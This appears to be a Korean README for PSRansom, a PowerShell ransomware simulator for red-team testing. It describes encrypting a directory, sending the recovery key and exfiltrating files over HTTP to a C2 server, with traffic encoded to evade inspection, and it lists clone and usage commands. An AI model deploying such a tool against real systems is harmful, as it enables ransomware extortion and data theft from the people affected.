
C2 서버를 포함한 PowerShell 랜섬웨어 시뮬레이터

PSRansom은 C2 서버 기능을 갖춘 PowerShell 랜섬웨어 시뮬레이터입니다. 이 도구는 PowerShell이 설치된 모든 시스템에서 일반적인 랜섬웨어의 암호화 프로세스를 시뮬레이션하는 데 도움을 줍니다. 통합된 C2 서버 덕분에 HTTP를 통해 파일을 유출하고 클라이언트 정보를 수신할 수 있습니다.
두 요소 간의 모든 통신은 트래픽 검사 메커니즘에 탐지되지 않도록 암호화 또는 인코딩되지만, 어떤 경우에도 HTTPS는 전혀 사용되지 않습니다.
전체 리포지토리를 클론하거나 zip 파일을 다운로드하는 것을 권장합니다. 다음 명령어를 실행하여 수행할 수 있습니다:
git clone https://github.com/JoelGMSec/PSRansom
.\PSRansom -h
____ ____ ____
| _ \/ ___|| _ \ __ _ _ __ ___ ___ _ __ ___
| |_) \___ \| |_) / _' | '_ \/ __|/ _ \| '_ ' _ \
| __/ ___) | _ < (_| | | | \__ \ (_) | | | | | |
|_| |____/|_| \_\__,_|_| |_|___/\___/|_| |_| |_|
----------------- by @JoelGMSec ----------------
Info: This tool helps you simulate encryption process of a
generic ransomware in PowerShell with C2 capabilities
Usage: .\PSRansom.ps1 -e Directory -s C2Server -p C2Port
Encrypt all files & sends recovery key to C2Server
Use -x to exfiltrate and decrypt files on C2Server
.\PSRansom.ps1 -d Directory -k RecoveryKey
Decrypt all files with recovery key string
Warning: All info will be sent to the C2Server without any encryption
You need previously generated recovery key to retrieve files
https://darkbyte.net/psransom-simulando-un-ransomware-generico-con-powershell
이 프로젝트는 GNU 3.0 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.
이 도구는 Joel Gámez Molina // @JoelGMSec에 의해 처음부터 생성 및 설계되었습니다.
이 소프트웨어는 어떠한 종류의 보증도 제공하지 않습니다. 사용은 교육 환경 및/또는 클라이언트의 해당 동의를 받은 보안 감사에만 독점적으로 사용됩니다. 오용이나 이로 인해 발생할 수 있는 모든 손해에 대해 책임을 지지 않습니다.
자세한 내용은 Twitter @JoelGMSec 및 블로그 darkbyte.net에서 확인할 수 있습니다.
제 작업을 후원하려면 커피 한 잔 사주세요: